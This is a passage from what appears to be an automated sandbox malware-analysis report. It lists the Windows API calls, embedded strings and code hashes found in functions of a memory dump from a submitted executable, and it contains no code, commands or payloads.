                      • Opcode ID: 7034bc18bff81061b2da986e030c030578914a3727aa671b786221720cc68c7a
                      • Instruction ID: dfb4d3df3c6db71cd4309e549573fc65cb780ade25403f9ee9d37542e295f5c0
                      • Opcode Fuzzy Hash: 7034bc18bff81061b2da986e030c030578914a3727aa671b786221720cc68c7a
                      • Instruction Fuzzy Hash: 0CB1FA75A00119AFDB14DFA4C888DAEBBF9EF88314B049469F509EB351DB31ED46CB50
                      APIs
                      • GetKeyboardState.USER32(?), ref: 00ED05A7
                      • SetKeyboardState.USER32(?), ref: 00ED0612
                      • GetAsyncKeyState.USER32(000000A0), ref: 00ED0632
                      • GetKeyState.USER32(000000A0), ref: 00ED0649
                      • GetAsyncKeyState.USER32(000000A1), ref: 00ED0678
                      • GetKeyState.USER32(000000A1), ref: 00ED0689
                      • GetAsyncKeyState.USER32(00000011), ref: 00ED06B5
                      • GetKeyState.USER32(00000011), ref: 00ED06C3
                      • GetAsyncKeyState.USER32(00000012), ref: 00ED06EC
                      • GetKeyState.USER32(00000012), ref: 00ED06FA
                      • GetAsyncKeyState.USER32(0000005B), ref: 00ED0723
                      • GetKeyState.USER32(0000005B), ref: 00ED0731
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: State$Async$Keyboard
                      • String ID:
                      • API String ID: 541375521-0
                      • Opcode ID: f1db4a0fb1b2ac853075531a311a69ba9712b7be29f5f4da9ab3b3eac4d6ccdc
                      • Instruction ID: 39eb21658ef583fc0fd9c676694148165ffc8466988e39c46f21e0843f586827
                      • Opcode Fuzzy Hash: f1db4a0fb1b2ac853075531a311a69ba9712b7be29f5f4da9ab3b3eac4d6ccdc
                      • Instruction Fuzzy Hash: 44512960A0478429FB34EBB094147EAAFF4DF01384F0C559BC9C27A7C2DA64DA4DCB51
                      APIs
                      • GetDlgItem.USER32(?,00000001), ref: 00ECC746
                      • GetWindowRect.USER32(00000000,?), ref: 00ECC758
                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00ECC7B6
                      • GetDlgItem.USER32(?,00000002), ref: 00ECC7C1
                      • GetWindowRect.USER32(00000000,?), ref: 00ECC7D3
                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00ECC827
                      • GetDlgItem.USER32(?,000003E9), ref: 00ECC835
                      • GetWindowRect.USER32(00000000,?), ref: 00ECC846
                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00ECC889
                      • GetDlgItem.USER32(?,000003EA), ref: 00ECC897
                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00ECC8B4
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00ECC8C1
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Window$ItemMoveRect$Invalidate
                      • String ID:
                      • API String ID: 3096461208-0
                      • Opcode ID: bfaffc74c244402e9b9c8a7906fab5d455f2c4c241ea79165cfd169b8e467d11
                      • Instruction ID: 3d988189d4510a04b39eccb62ac5fcfc28f1a42ce7e9bbe6a15b54e014cf5571
                      • Opcode Fuzzy Hash: bfaffc74c244402e9b9c8a7906fab5d455f2c4c241ea79165cfd169b8e467d11
                      • Instruction Fuzzy Hash: 03514E71B00205AFDB18CF69DD89EAEBBB6EF88710F14812DF519E6290DB71A944CB50
                      APIs
                        • Part of subcall function 00E71B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E72036,?,00000000,?,?,?,?,00E716CB,00000000,?), ref: 00E71B9A
                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E720D3
                      • KillTimer.USER32(-00000001,?,?,?,?,00E716CB,00000000,?,?,00E71AE2,?,?), ref: 00E7216E
                      • DestroyAcceleratorTable.USER32(00000000), ref: 00EABEF6
                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E716CB,00000000,?,?,00E71AE2,?,?), ref: 00EABF27
                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E716CB,00000000,?,?,00E71AE2,?,?), ref: 00EABF3E
                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E716CB,00000000,?,?,00E71AE2,?,?), ref: 00EABF5A
                      • DeleteObject.GDI32(00000000), ref: 00EABF6C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                      • String ID:
                      • API String ID: 641708696-0
                      • Opcode ID: da03f96e6af86fd8f24861cee047b14ddc8359a13aecc41124f64e3a0d83fa30
                      • Instruction ID: 1e7962d6ea53ebf622661574d2dd559627c79350632d9db115d9a40a120d11b3
                      • Opcode Fuzzy Hash: da03f96e6af86fd8f24861cee047b14ddc8359a13aecc41124f64e3a0d83fa30
                      • Instruction Fuzzy Hash: E061C034201604EFCB359F15CC48B25B7F2FF49329F54E52CE246AA5A1C771A890EF60
                      APIs
                        • Part of subcall function 00E725DB: GetWindowLongW.USER32(?,000000EB), ref: 00E725EC
                      • GetSysColor.USER32(0000000F), ref: 00E721D3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ColorLongWindow
                      • String ID:
                      • API String ID: 259745315-0
                      • Opcode ID: 06bf99c694146f6bb56fe6cfc15569979f9d3360fd796db73679d57de23e1c23
                      • Instruction ID: dd75b999184dc3a6e4fee37c67cb8752e4311262d20a7e9ce21371f92e824f77
                      • Opcode Fuzzy Hash: 06bf99c694146f6bb56fe6cfc15569979f9d3360fd796db73679d57de23e1c23
                      • Instruction Fuzzy Hash: E941B431101180AFDB215F68EC88BB937A5EF46335F249269FE69AA1F3C7318D42DB11
                      APIs
                      • CharLowerBuffW.USER32(?,?,00EFF910), ref: 00EDAB76
                      • GetDriveTypeW.KERNEL32(00000061,00F2A620,00000061), ref: 00EDAC40
                      • _wcscpy.LIBCMT ref: 00EDAC6A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: BuffCharDriveLowerType_wcscpy
                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                      • API String ID: 2820617543-1000479233
                      • Opcode ID: fed1e5924f548145ba46d6bebac1359be8a372bf717e286dbf1599131271d6d6
                      • Instruction ID: 929572990f28a11899f83c87fcd3d22fb6533c6578b2c2fabb626e6874dda639
                      • Opcode Fuzzy Hash: fed1e5924f548145ba46d6bebac1359be8a372bf717e286dbf1599131271d6d6
                      • Instruction Fuzzy Hash: 7451A1301183019FC710EF14C881AAEB7E5EF84314F58A82EF496772A2DB31DE4ACA53
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: __i64tow__itow__swprintf
                      • String ID: %.15g$0x%p$False$True
                      • API String ID: 421087845-2263619337
                      • Opcode ID: 51edd2046aa8cfa4d0781875a845fe00b07ce6de824961e6e231d0614ba64b01
                      • Instruction ID: 24f6ba366f84cba773d11d660b35f7d624e9f7e34d93e6d6b4474dc6cd01ad40
                      • Opcode Fuzzy Hash: 51edd2046aa8cfa4d0781875a845fe00b07ce6de824961e6e231d0614ba64b01
                      • Instruction Fuzzy Hash: 3141E571604605AFEF24EBB4DC41E7673E4EF89304F20986EE64DFA292EA31E941D711
                      APIs
                      • _memset.LIBCMT ref: 00EF73D9
                      • CreateMenu.USER32 ref: 00EF73F4
                      • SetMenu.USER32(?,00000000), ref: 00EF7403
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EF7490
                      • IsMenu.USER32(?), ref: 00EF74A6
                      • CreatePopupMenu.USER32 ref: 00EF74B0
                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EF74DD
                      • DrawMenuBar.USER32 ref: 00EF74E5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                      • String ID: 0$F
                      • API String ID: 176399719-3044882817
                      • Opcode ID: bdac3081f2c5128d7f12bcd6195238f35adc59922e966bf85b1617949160f569
                      • Instruction ID: 7570da1f70c66f49205a3063b333cf92ad25c08087a8b9315c67ccf737f7ac64
                      • Opcode Fuzzy Hash: bdac3081f2c5128d7f12bcd6195238f35adc59922e966bf85b1617949160f569
                      • Instruction Fuzzy Hash: 04415875A00209EFDB20DF65D884AEABBF5FF49315F144029EA65A7360D730AD14CB50
                      APIs
                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00EF77CD
                      • CreateCompatibleDC.GDI32(00000000), ref: 00EF77D4
                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00EF77E7
                      • SelectObject.GDI32(00000000,00000000), ref: 00EF77EF
                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EF77FA
                      • DeleteDC.GDI32(00000000), ref: 00EF7803
                      • GetWindowLongW.USER32(?,000000EC), ref: 00EF780D
                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00EF7821
                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00EF782D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                      • String ID: static
                      • API String ID: 2559357485-2160076837
                      • Opcode ID: 9431347d6897b2ec028cc8ba4a76e374c0d614f048b6a94ed2a864b40fe533e9
                      • Instruction ID: a72b631b7c2bc06bc4d2c2cc66c72d72d778e0b3bcce595f20384ba73dc64c1c
                      • Opcode Fuzzy Hash: 9431347d6897b2ec028cc8ba4a76e374c0d614f048b6a94ed2a864b40fe533e9
                      • Instruction Fuzzy Hash: 70318A32105219BFDF119FA5DC08FEA3B69EF89365F110225FA55B61A0CB31D821DBA4
                      APIs
                      • _memset.LIBCMT ref: 00E9707B
                        • Part of subcall function 00E98D68: __getptd_noexit.LIBCMT ref: 00E98D68
                      • __gmtime64_s.LIBCMT ref: 00E97114
                      • __gmtime64_s.LIBCMT ref: 00E9714A
                      • __gmtime64_s.LIBCMT ref: 00E97167
                      • __allrem.LIBCMT ref: 00E971BD
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E971D9
                      • __allrem.LIBCMT ref: 00E971F0
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E9720E
                      • __allrem.LIBCMT ref: 00E97225
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E97243
                      • __invoke_watson.LIBCMT ref: 00E972B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                      • String ID:
                      • API String ID: 384356119-0
                      • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                      • Instruction ID: 12bfc89b30320ef25891bfabd4c2ab489838032ebe219717e79482128fde77fc
                      • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                      • Instruction Fuzzy Hash: FF7108B1A18706ABDB149F79CC41B5AB3E8AF55324F14523AF454FB2C1E770EA048790
                      APIs
                      • _memset.LIBCMT ref: 00ED2A31
                      • GetMenuItemInfoW.USER32(00F36890,000000FF,00000000,00000030), ref: 00ED2A92
                      • SetMenuItemInfoW.USER32(00F36890,00000004,00000000,00000030), ref: 00ED2AC8
                      • Sleep.KERNEL32(000001F4), ref: 00ED2ADA
                      • GetMenuItemCount.USER32(?), ref: 00ED2B1E
                      • GetMenuItemID.USER32(?,00000000), ref: 00ED2B3A
                      • GetMenuItemID.USER32(?,-00000001), ref: 00ED2B64
                      • GetMenuItemID.USER32(?,?), ref: 00ED2BA9
                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00ED2BEF
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ED2C03
                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ED2C24
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                      • String ID:
                      • API String ID: 4176008265-0
                      • Opcode ID: 15e837262acc33d2caea96ce032676115f6b48cfdaf7de210e491d3f440049d7
                      • Instruction ID: 08b69baa2396e07741d32cf4a09340a522ada879f22b4e8964d80a93d26ed903
                      • Opcode Fuzzy Hash: 15e837262acc33d2caea96ce032676115f6b48cfdaf7de210e491d3f440049d7
                      • Instruction Fuzzy Hash: DE618EB0900249AFDB21CF64CC88DBEBBB9EB61308F14555EEA51B7351D771AD06DB20
                      APIs
                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00EF7214
                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00EF7217
                      • GetWindowLongW.USER32(?,000000F0), ref: 00EF723B
                      • _memset.LIBCMT ref: 00EF724C
                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EF725E
                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00EF72D6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessageSend$LongWindow_memset
                      • String ID:
                      • API String ID: 830647256-0
                      • Opcode ID: 9c3b4abba9bf910705a01a0b162f5443205b6f480c9262694018d13d511bbacf
                      • Instruction ID: 98d2ef841e450110b2fc715511af47fbbb1c2e731810ceb59222ad198ce76166
                      • Opcode Fuzzy Hash: 9c3b4abba9bf910705a01a0b162f5443205b6f480c9262694018d13d511bbacf
                      • Instruction Fuzzy Hash: 03615971A00208AFDB20DFA4CC81EEE77F9AF09714F144199FA54E72A1D770AD45DB60
                      APIs
                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00EC7135
                      • SafeArrayAllocData.OLEAUT32(?), ref: 00EC718E
                      • VariantInit.OLEAUT32(?), ref: 00EC71A0
                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00EC71C0
                      • VariantCopy.OLEAUT32(?,?), ref: 00EC7213
                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00EC7227
                      • VariantClear.OLEAUT32(?), ref: 00EC723C
                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00EC7249
                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EC7252
                      • VariantClear.OLEAUT32(?), ref: 00EC7264
                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EC726F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                      • String ID:
                      • API String ID: 2706829360-0
                      • Opcode ID: e42a0acac0697d3ade1af5c37876d3bd97f62c1b3a7b1116fd9416ef011b5a05
                      • Instruction ID: c98c9f589dab989b422a99f54e17eb75f4ac2f2052a18c5727b5b8758731852d
                      • Opcode Fuzzy Hash: e42a0acac0697d3ade1af5c37876d3bd97f62c1b3a7b1116fd9416ef011b5a05
                      • Instruction Fuzzy Hash: 9E416D71A00219AFCB04DF65D948EAEBBB8FF48354F008069F955B7261CB31A94ACF90
                      APIs
                      • WSAStartup.WSOCK32(00000101,?), ref: 00EE5AA6
                      • inet_addr.WSOCK32(?), ref: 00EE5AEB
                      • gethostbyname.WSOCK32(?), ref: 00EE5AF7
                      • IcmpCreateFile.IPHLPAPI ref: 00EE5B05
                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EE5B75
                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EE5B8B
                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00EE5C00
                      • WSACleanup.WSOCK32 ref: 00EE5C06
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                      • String ID: Ping
                      • API String ID: 1028309954-2246546115
                      • Opcode ID: caa65d604827bacb4f118cdebe8a5f0583a163b6cdfd5a6ca4607201e3e824c5
                      • Instruction ID: d093cf8b52408801ad521f7587c772b300c696cee71e3a46fc153f46735fe7ff
                      • Opcode Fuzzy Hash: caa65d604827bacb4f118cdebe8a5f0583a163b6cdfd5a6ca4607201e3e824c5
                      • Instruction Fuzzy Hash: 4C51B1326047009FDB10AF26CC45B2AB7E0EF84318F14992AF559FB2A1DB70E800CF52
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 00EDB73B
                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00EDB7B1
                      • GetLastError.KERNEL32 ref: 00EDB7BB
                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00EDB828
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Error$Mode$DiskFreeLastSpace
                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                      • API String ID: 4194297153-14809454
                      • Opcode ID: 720a9e6923aec9788a30bc4f18adaacfc2916452b47b4038e6fb3058554a1cee
                      • Instruction ID: acfeacb450a53fa58db09abd8a2348503575e4a8a660c4a825a220fd267e1f05
                      • Opcode Fuzzy Hash: 720a9e6923aec9788a30bc4f18adaacfc2916452b47b4038e6fb3058554a1cee
                      • Instruction Fuzzy Hash: 59319C35A00209DFDB00EF64D885AFE7BB8EF84704F11912BE506F7392EB719942DA51
                      APIs
                        • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                        • Part of subcall function 00ECB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB0E7
                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00EC94F6
                      • GetDlgCtrlID.USER32 ref: 00EC9501
                      • GetParent.USER32 ref: 00EC951D
                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EC9520
                      • GetDlgCtrlID.USER32(?), ref: 00EC9529
                      • GetParent.USER32(?), ref: 00EC9545
                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00EC9548
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
